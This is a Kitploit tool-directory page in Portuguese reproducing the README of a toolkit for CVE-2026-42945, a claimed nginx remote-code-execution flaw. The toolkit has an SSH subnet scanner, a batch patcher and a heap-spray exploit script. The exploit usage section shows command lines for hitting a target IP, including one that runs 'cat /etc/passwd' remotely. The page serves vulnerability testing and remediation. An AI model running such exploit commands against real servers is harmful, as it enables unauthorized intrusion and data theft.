Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42945-NGINX-Rift-Toolkit — Ferramenta automatizada para escanear, explorar e corrigir o CVE-2026-42945 (RCE crítico no nginx). Inclui scanner de rede, exploit de heap spray e corretor em lote com relatórios em HTML/JSON. | Kitploit
Ferramentas/GitHubGitHub/gagaltotal/cve-2026-42945-nginx-rift-toolkit
Scanners de VulnerabilidadesMapeamento de RedeExploraçãoAuditoria de ConfiguraçãoSegurança WebTestes de Penetração
GitHubgagaltotal/cve-2026-42945-nginx-rift-toolkit

CVE-2026-42945-NGINX-Rift-Toolkit

Ferramenta automatizada para escanear, explorar e corrigir o CVE-2026-42945 (RCE crítico no nginx). Inclui scanner de rede, exploit de heap spray e corretor em lote com relatórios em HTML/JSON.

Ver RepositórioSite
4112há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-42945 Kit de Ferramentas para Vulnerabilidade Nginx Rift

CVSS Score: 9.8 - Critical Python Version License

Kit de ferramentas abrangente para escanear, corrigir e testar CVE-2026-42945 - uma vulnerabilidade crítica de RCE no nginx

Índice

  • Overview
  • CVE Details
  • Features
  • Toolkit Components
  • Requirements
  • Installation
  • Usage
  • Workflow Examples
  • Security Considerations
  • Troubleshooting
  • Contributing

Visão Geral

Este kit fornece ferramentas abrangentes para escanear, corrigir e testar CVE-2026-42945, uma vulnerabilidade crítica de Execução Remota de Código no nginx que afeta versões anteriores a 1.26.3 (mainline) e 1.24.1 (stable).

A vulnerabilidade explora a análise malformada de cabeçalhos HTTP/2 quando o ASLR está desabilitado usando técnicas de heap spray.

Detalhes do CVE

PropriedadeValor
ID da VulnerabilidadeCVE-2026-42945
TipoExecução Remota de Código (RCE)
Pontuação CVSS9.8 (Crítico)
Versões Afetadas< 1.26.3 (mainline) / < 1.24.1 (stable)
Versão Corrigida1.26.3+
Vetor de AtaqueAnálise malformada de cabeçalhos HTTP/2
Pré-requisitoASLR desabilitado no sistema alvo

Funcionalidades

  • Escaneamento de Rede - Varredura de sub-rede CIDR com descoberta simultânea de hosts
  • Detecção de Versão - Identificação de versão do nginx em múltiplas distribuições via SSH
  • Correção Automatizada - Correção em lote de instâncias vulneráveis em redes
  • Teste de Exploração - Verificar vulnerabilidade com técnicas de heap spray
  • Geração de Relatórios - Relatórios em formato HTML e JSON
  • Modo de Simulação - Visualizar alterações antes de aplicar
  • Autenticação Múltipla - Autenticação por chave SSH e senha
  • Registro de Auditoria - Logs detalhados com carimbo de data/hora

Componentes do Kit

1. nginx_scanner.py - Escâner de Vulnerabilidade

Escaneia uma sub-rede ou um único host para identificar instalações vulneráveis do nginx.

Recursos:

  • Suporte a varredura de sub-rede CIDR
  • Descoberta simultânea de hosts e detecção de versão
  • Verificação remota de versão via SSH
  • Suporte a múltiplas distribuições (Ubuntu, Debian, CentOS, AlmaLinux, RHEL)
  • Geração de relatórios HTML e JSON
  • Portas SSH personalizáveis e métodos de autenticação

2. nginx_patcher.py - Automação de Correção

Corrige automaticamente instâncias vulneráveis do nginx para a versão segura mais recente.

Recursos:

  • Correção em lote em intervalos de sub-rede
  • Comandos de correção específicos por distribuição
  • Modo de simulação para validação segura
  • Especificação de versão alvo
  • Logs detalhados de execução de correção
  • Acompanhamento de progresso e relatórios

3. exploit.py - Exploração de Execução Remota de Código

Testa a vulnerabilidade CVE-2026-42945 via técnica de heap spray.

Recursos:

  • Alvo em instâncias nginx com ASLR desabilitado
  • Exploração de estouro de buffer via heap spray
  • Suporte a múltiplos offsets para maior confiabilidade
  • Capacidade de execução remota de comandos
  • Mecanismos de timeout e retry de conexão
  • Estatísticas detalhadas de execução

Distribuições Suportadas

  • Ubuntu (todas as versões com nginx)
  • Debian (todas as versões com nginx)
  • CentOS 7+
  • AlmaLinux
  • RHEL (Red Hat Enterprise Linux)

Requisitos

  • Python: 3.7 ou superior
  • SO: Ambiente Linux/Unix

Dependências

paramiko (>= 3.0.0) - Biblioteca cliente SSH
rich (>= 13.0.0) - Formatação de terminal e barras de progresso

Instalação

Passo 1: Clonar ou Baixar

git clone https://github.com/gagaltotal/CVE-2026-42945-NGINX-Rift-Toolkit
cd CVE-2026-42945-NGINX-Rift-Toolkit

Passo 2: Criar Ambiente Virtual

python3 -m venv .venv
source .venv/bin/activate

Passo 3: Instalar Dependências

pip install -r requirements.txt

Uso

Screen Capture

Escâner (nginx_scanner.py)

Varredura Básica de Sub-rede

python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Varredura de Único Host

python3 nginx_scanner.py --subnet 192.168.1.10 --user root --key ~/.ssh/id_rsa

Autenticação por Senha

python3 nginx_scanner.py --subnet 10.0.0.0/30 --user admin --password "password"

Porta SSH Personalizada

python3 nginx_scanner.py --subnet 192.168.1.0/24 --port 2222 --user root --key ~/.ssh/id_rsa

Gerar Relatório HTML

python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --output report.html

Opções do Escâner

--subnet SUBNET              Sub-rede alvo no formato CIDR (obrigatório)
--user USER                  Usuário SSH (padrão: root)
--password PASSWORD          Senha SSH
--key KEY_PATH              Caminho para a chave privada SSH
--port PORT                 Porta SSH (padrão: 22)
--timeout TIMEOUT           Timeout de conexão em segundos (padrão: 5)
--output FILE               Arquivo de relatório de saída (HTML/JSON)
--workers WORKERS           Número de threads simultâneas (padrão: 20)

Corretor (nginx_patcher.py)

Screen Capture

Correção Básica

python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Modo de Simulação (Visualizar sem Aplicar)

python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --dry-run

Versão Alvo Específica

python3 nginx_patcher.py --subnet 192.168.1.0/24 --target-version 1.26.3 --user root --key ~/.ssh/id_rsa

Porta SSH Personalizada

python3 nginx_patcher.py --subnet 10.0.0.0/30 --port 2222 --user admin --password "password"

Opções do Corretor

--subnet SUBNET              Sub-rede alvo no formato CIDR (obrigatório)
--user USER                  Usuário SSH (padrão: root)
--password PASSWORD          Senha SSH
--key KEY_PATH              Caminho para a chave privada SSH
--port PORT                 Porta SSH (padrão: 22)
--timeout TIMEOUT           Timeout de conexão em segundos (padrão: 30)
--target-version VERSION    Versão do nginx para correção (padrão: latest)
--dry-run                   Mostrar o que seria corrigido sem executar
--workers WORKERS           Número de threads simultâneas (padrão: 10)

Exploit (exploit.py)

Screen Capture

Exploração de Único Alvo

python3 exploit.py --target 192.168.1.100 --port 80

Com Payload Personalizado

python3 exploit.py --target 192.168.1.100 --port 80 --command "cat /etc/passwd"

Múltiplas Tentativas de Spray

python3 exploit.py --target 192.168.1.100 --port 80 --spray 50

Saída Detalhada

python3 exploit.py --target 192.168.1.100 --port 80 --verbose
Baixar ferramenta